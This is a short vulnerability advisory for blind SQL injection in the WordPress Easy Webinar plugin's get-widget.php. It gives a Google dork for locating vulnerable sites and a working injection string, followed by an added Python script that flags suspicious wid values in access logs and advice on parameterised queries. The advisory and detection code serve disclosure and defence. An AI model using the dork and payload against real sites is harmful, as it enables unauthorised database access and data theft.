# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability
# Vendor Homepage: www.easywebinarplugin.com
# Date: 10/26/2012
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
# Tested on: [Linux/Windows 7]
# Vulnerable Parameters: wid=
# Google Dork: allinurl:get-widget.php?wid=
##############################################################
Exploit:
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]
Note: The HTTP response will read 404, but this is false:
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x
This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################
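Detection sketch for defenders (an added example, not part of the original advisory or the plugin's code): it scans web server access log lines for requests to get-widget.php whose wid value is not a plain integer, and deliberately ignores the status code because, as noted above, the 404 is misleading. The combined log format, the numeric-ID assumption for wid, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate wid values are plain decimal IDs (the advisory's sample uses wid=3).
NUMERIC_ID = re.compile(r"\d{1,10}")
# Assumption: common/combined access log format (client IP, quoted request line, status).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
PLUGIN_PATH = "/webinar_plugin/get-widget.php"

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Oct/2012:10:01:02 +0000] "GET /wp-content/plugins/'
    'webinar_plugin/get-widget.php?wid=3 HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Oct/2012:10:01:09 +0000] "GET /wp-content/plugins/'
    'webinar_plugin/get-widget.php?wid=3%27%20or%20%27x%27=%27x HTTP/1.1" 404 2048 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [26/Oct/2012:10:02:00 +0000] "GET /index.php?wid=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def suspicious_wid_requests(lines):
    """Return (ip, status, decoded_wid) for get-widget.php requests with a non-integer wid."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(PLUGIN_PATH):
            continue
        # parse_qs percent-decodes values, so %27 and %20 are normalised before the check.
        # The status code is recorded but never used as a filter: the plugin answers 404
        # even when the page renders, so status-based triage would miss these requests.
        for wid in parse_qs(parts.query, keep_blank_values=True).get("wid", []):
            if not NUMERIC_ID.fullmatch(wid):
                hits.append((m.group("ip"), int(m.group("status")), wid))
    return hits

if __name__ == "__main__":
    for ip, status, wid in suspicious_wid_requests(SAMPLE_LOG):
        print(f"{ip} status={status} wid={wid!r}")
```

The same integer-only rule belongs in the application itself: cast or validate wid as an integer and bind it as a query parameter instead of concatenating it into SQL.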